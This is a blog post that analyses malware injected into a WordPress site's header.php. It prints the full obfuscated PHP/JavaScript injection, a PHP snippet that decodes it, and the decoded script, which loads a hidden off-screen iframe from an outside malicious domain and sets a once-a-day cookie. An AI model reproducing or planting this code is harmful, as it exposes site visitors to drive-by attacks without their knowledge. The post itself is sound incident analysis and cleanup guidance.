Wordpress Hack

October 7, 2013
Code, Fixes
0 Comments
paris

Recently a customer’s site was hacked from an out of date plugin. The hack was pretty cool and took me a few hours to decipher

The hack entailed entering the following PHP code in the header of each file with the body tag

Source code

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This file then creating an iFrame which linked to another php file.

As you can see the code its really ciphered to stop detection however thanks to StopBadware.org , it was logged and alerted.

The below works by using 2 functions

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see below wtesq is declared to be 4 so this changes to -(62)+parseInt(iymigs[atodfh]16). This gets Java script to change the bolded string values into radix 16 values minus 62. Here’s some PHP to do this

Source code

<?php
 
$str = "%the string with commas removed%";
 
$hex = str_split($str, 2);
 
foreach ($hex as $value) {
    echo -(62)+intval("$value", 16);
    echo ", ";
 
}
 
?>

2) Cleverly hidden in \”fr\”+\”omCh\”+\”ar\”+\”Co\”+\”de\ gives you “fromCharCode” , so the values of this can be inserted into this online tool

http://jdstiles.com/java/cct.html

Which then gives us the code

Source code

function algl09() {
 var static='ajax';
 var controller='index.php';
 var algl = document.createElement('iframe');
 
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098';
 algl.style.top = '100098';
 
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}

To clean the exploit remove this off the header.php in WordPress and also clear up and HTML/PHP files in the root directory the hacker has created

(No Ratings Yet)